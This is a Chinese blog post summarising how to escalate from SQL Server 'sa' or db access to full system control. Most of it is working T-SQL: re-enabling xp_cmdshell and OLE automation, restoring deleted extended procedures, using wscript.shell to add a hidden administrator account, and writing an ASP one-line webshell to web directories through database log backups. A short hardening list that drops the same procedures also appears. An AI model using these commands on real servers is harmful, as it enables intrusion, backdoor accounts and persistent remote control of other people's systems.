• SQL2005之SA提权总结


    首先,看看xp_cmdshell存在不,不存在的话先恢复下。

    Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;

    然后,Exec master.dbo.xp_cmdshell 'net user' 持行命令。

    SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。用下面一句话就可以了解决了:

    ;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--

    关闭一样.只是将上面的后面的那个"1"改成"0"就可以了:

    ;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;--

    如果cmdshell还不行的话,就再运行:

    ;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--

    或:

    ;sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

    来恢复cmdshell。

    1433SQL入侵恢复xp_cmdshell方法总结:

    sql server 2005下开启xp_cmdshell的办法:

    EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

    SQL2005开启'OPENROWSET'支持的方法:

    exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;

    SQL2005开启'sp_oacreate'支持的方法:

    exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;

    突破SA的各种困难:

    0x00:常见情况恢复执行xp_cmdshell

    0x01:未能找到存储过程'master..xpcmdshell'

    恢复方法:查询分离器连接后,
    第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
    第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
    然后按F5键命令执行完毕
    0x02:无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块)
    恢复方法:查询分离器连接后,
    第一步执行:sp_dropextendedproc "xp_cmdshell"
    第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
    然后按F5键命令执行完毕
    0x03:无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序)
    恢复方法:查询分离器连接后,
    第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
    第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
    然后按F5键命令执行完毕
    0x04:终极办法
    如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
    查询分离器连接后:
     
    2000servser系统:
     
    declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:winntsystem32cmd.exe /c net user dell huxifeng007 /add'
     
    declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:winntsystem32cmd.exe /c net localgroup administrators dell /add'
     
    xp或2003server系统:
     
    declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:windowssystem32cmd.exe /c net user dell huxifeng007 /add'
     
    declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:windowssystem32cmd.exe /c net localgroup administrators dell /add'
     
     
    --------------
     
    xp_cmdshell新的恢复办法:
    恢复
    dbcc addextendedproc ("sp_oacreate","odsole70.dll")
    dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
    这样可以直接恢复,不用去管sp_addextendedproc是不是存在
     
    删除
    drop procedure sp_addextendedproc
    drop procedure sp_oacreate
    exec sp_dropextendedproc 'xp_cmdshell'
     
     
    删除扩展存储过过程xp_cmdshell的语句:
    exec sp_dropextendedproc 'xp_cmdshell'
     
    恢复cmdshell的sql语句:
    exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
    开启cmdshell的sql语句:
    exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
    判断存储扩展是否存在:
    select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
    返回结果为1就ok!
    恢复xp_cmdshell:
    exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
    返回结果为1就ok!
    否则上传xplog7.0.dll:
    exec master.dbo.addextendedproc 'xp_cmdshell','c:winntsystem32xplog70.dll'
    堵上cmdshell的sql语句:
    sp_dropextendedproc "xp_cmdshell
     
    -----------------------------------------
    删除sql危险存储:
    DROP PROCEDURE sp_makewebtask
    exec master..sp_dropextendedproc xp_cmdshell
    exec master..sp_dropextendedproc xp_dirtree
    exec master..sp_dropextendedproc xp_fileexist
    exec master..sp_dropextendedproc xp_terminate_process
    exec master..sp_dropextendedproc sp_oamethod
    exec master..sp_dropextendedproc sp_oacreate
    exec master..sp_dropextendedproc xp_regaddmultistring
    exec master..sp_dropextendedproc xp_regdeletekey
    exec master..sp_dropextendedproc xp_regdeletevalue
    exec master..sp_dropextendedproc xp_regenumkeys
    exec master..sp_dropextendedproc xp_regenumvalues
    exec master..sp_dropextendedproc sp_add_job
    exec master..sp_dropextendedproc sp_addtask
    exec master..sp_dropextendedproc xp_regread
    exec master..sp_dropextendedproc xp_regwrite
    exec master..sp_dropextendedproc xp_readwebtask
    exec master..sp_dropextendedproc xp_makewebtask
    exec master..sp_dropextendedproc xp_regremovemultistring
    exec master..sp_dropextendedproc sp_OACreate
    DROP PROCEDURE sp_addextendedproc
     
    恢复扩展存储过程的办法:
    先恢复sp_addextendedproc:
    create procedure sp_addextendedproc --- 1996/08/30 20:13 
    @functname nvarchar(517),/* (owner.)name of function to call */ @dllname varchar(255)/* name of DLL containing function */ as 
    set implicit_transactions off 
    if @@trancount > 0    
    begin 
    raiserror(15002,-1,-1,'sp_addextendedproc')    
    return (1)    
    end 
    dbcc addextendedproc( @functname, @dllname)    
    return (0) -- sp_addextendedproc 
    GO
    再恢复以上所有扩展存储过程:
    use master    
    exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'    
    exec sp_addextendedproc xp_dirtree,'xpstar.dll'    
    exec sp_addextendedproc xp_enumgroups,'xplog70.dll'    
    exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'    
    exec sp_addextendedproc xp_loginconfig,'xplog70.dll'    
    exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'    
    exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'    
    exec sp_addextendedproc sp_OACreate,'odsole70.dll'    
    exec sp_addextendedproc sp_OADestroy,'odsole70.dll'    
    exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'    
    exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'    
    exec sp_addextendedproc sp_OAMethod,'odsole70.dll'    
    exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'    
    exec sp_addextendedproc sp_OAStop,'odsole70.dll'    
    exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'    
    exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'    
    exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'    
    exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'    
    exec sp_addextendedproc xp_regread,'xpstar.dll'    
    exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'    
    exec sp_addextendedproc xp_regwrite,'xpstar.dll'    
    exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
     
    SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。
     
    db权限的时候一句话木马备份shell:
    1.log
    create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup log @a to disk=@s;insert into [bin_cmd](cmd)values('<%execute(request(chr(35)))%>');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='e:1.asp' backup log @b to disk=@t with init,no_truncate;drop table [bin_cmd];
     
    2.data
    create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup database @a to disk=@s;insert into [bin_cmd](cmd)values('<%execute(request(chr(35)))%>');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='c:in.asp' backup database @b to disk=@t WITH
     
     
  • 相关阅读:
    WeakHashMap、IdentityHashMap 、EnumMap简单了解——高淇JAVA300讲笔记之其他Map实现类
    Properties简介——高淇JAVA300讲笔记之Hashtable
    简单实现一个自定义的HashMap——高淇JAVA300讲笔记之HashMap
    简单实现一个自定义的HashSet——高淇JAVA300讲笔记之HashSet
    Enumeration接口——高淇JAVA300讲笔记之其他容器
    Queue接口——高淇JAVA300讲笔记之其他容器
    Collections类的常用方法——高淇JAVA300讲笔记之Collections类
    排序容器——高淇JAVA300讲笔记之TreeSet与TreeMap
    类的引用类型成员
    CentOS5.4下安装codeblocks 12.11
  • 原文地址:https://www.cnblogs.com/milantgh/p/3606149.html
Copyright © 2020-2023  润新知